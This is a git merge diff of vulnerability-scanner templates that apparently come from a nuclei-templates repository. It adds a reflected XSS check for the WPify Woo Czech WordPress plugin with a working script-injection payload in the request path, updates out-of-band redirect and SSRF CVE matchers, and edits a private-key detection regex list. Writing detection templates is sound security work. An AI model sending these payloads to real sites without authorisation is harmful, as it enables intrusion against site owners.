Merge branch 'master' into dashboard

2022-06-28 08:42:51 +05:30 · 2022-06-28 08:42:51 +05:30 · 28d6f55f15
parent 58427e0d41 1c89fb1b68
commit 28d6f55f15
7 changed files with 70 additions and 25 deletions
--- a/.new-additions
+++ b/.new-additions
@ -22,3 +22,4 @@ vulnerabilities/other/royalevent/royalevent-management-xss.yaml
 vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
 vulnerabilities/wordpress/new-user-approve-xss.yaml
 vulnerabilities/wordpress/sym404.yaml
+vulnerabilities/wordpress/wpify-woo-czech-xss.yaml
--- a/cves/2021/CVE-2021-22054.yaml
+++ b/cves/2021/CVE-2021-22054.yaml
@ -28,7 +28,7 @@ requests:

      - type: word
        words:
-          - "<h1> Interactsh Server </h1>"
+          - "Interactsh Server"

      - type: status
        status:
--- a/cves/2021/CVE-2021-22873.yaml
+++ b/cves/2021/CVE-2021-22873.yaml
@ -15,7 +15,10 @@ info:
    cvss-score: 6.1
    cve-id: CVE-2021-22873
    cwe-id: CWE-601
-  tags: cve,cve2021,redirect
+  metadata:
+    shodan-query: http.favicon.hash:106844876
+    verified: "true"
+  tags: cve,cve2021,redirect,revive

 requests:
  - method: GET
@ -30,12 +33,8 @@ requests:
    stop-at-first-match: true
    redirects: true
    max-redirects: 2
-    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "<h1> Interactsh Server </h1>"
-        part: body
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
--- a/cves/2021/CVE-2021-27748.yaml
+++ b/cves/2021/CVE-2021-27748.yaml
@ -12,6 +12,9 @@ info:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
  classification:
    cve-id: CVE-2021-27748
+  metadata:
+    verified: true
+    shodan-query: http.html:"IBM WebSphere Portal"
  tags: cve,cve2021,hcl,ibm,ssrf,websphere

 requests:
@ -28,9 +31,8 @@ requests:

      - type: word
        words:
-          - "<h1> Interactsh Server </h1>"
+          - "Interactsh Server"

      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/06/27
--- a/file/keys/private-key.yaml
+++ b/file/keys/private-key.yaml
@ -13,12 +13,12 @@ file:
    extractors:
      - type: regex
        regex:
-          - "\"BEGIN OPENSSH PRIVATE KEY\""
-          - "\"BEGIN PRIVATE KEY\""
-          - "\"BEGIN RSA PRIVATE KEY\""
-          - "\"BEGIN DSA PRIVATE KEY\""
-          - "\"BEGIN EC PRIVATE KEY\""
-          - "\"BEGIN PGP PRIVATE KEY BLOCK\""
-          - "\"ssh-rsa\""
-          - "\"ssh-dsa\""
-          - "\"ssh-ed25519\""
+          - "BEGIN OPENSSH PRIVATE KEY"
+          - "BEGIN PRIVATE KEY"
+          - "BEGIN RSA PRIVATE KEY"
+          - "BEGIN DSA PRIVATE KEY"
+          - "BEGIN EC PRIVATE KEY"
+          - "BEGIN PGP PRIVATE KEY BLOCK"
+          - "ssh-rsa"
+          - "ssh-dsa"
+          - "ssh-ed25519"
--- a/technologies/interactsh-server.yaml
+++ b/technologies/interactsh-server.yaml
@ -4,6 +4,9 @@ info:
  name: Interactsh Server
  author: pdteam
  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Interactsh Server"
  tags: tech,interactsh

 requests:
@ -11,10 +14,15 @@ requests:
    path:
      - "{{BaseURL}}"

+    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "<h1> Interactsh Server </h1>"
+          - "Interactsh Server"
+
+      - type: status
+        status:
+          - 200

    extractors:
      - type: regex
--- a/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml
+++ b/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml
@ -0,0 +1,35 @@
+id: wpify-woo-czech-xss
+
+info:
+  name: WPify Woo Czech < 3.5.7 - Reflected Cross-Site Scripting (XSS)
+  author: Akincibor
+  severity: medium
+  description: The plugin uses the Vies library v2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first, leading to a Reflected Cross-Site Scripting. The issue is only exploitable when the web server has the PDO driver installed, and write access to the example directory (otherwise an exception will be raised before the payload is output)..
+  reference:
+    - https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
+  metadata:
+    verified: true
+  tags: wp,wordpress,xss,wp-plugin,wpify
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>alert(document.domain)</script>'
+          - 'Add a new VAT ID to the queue'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200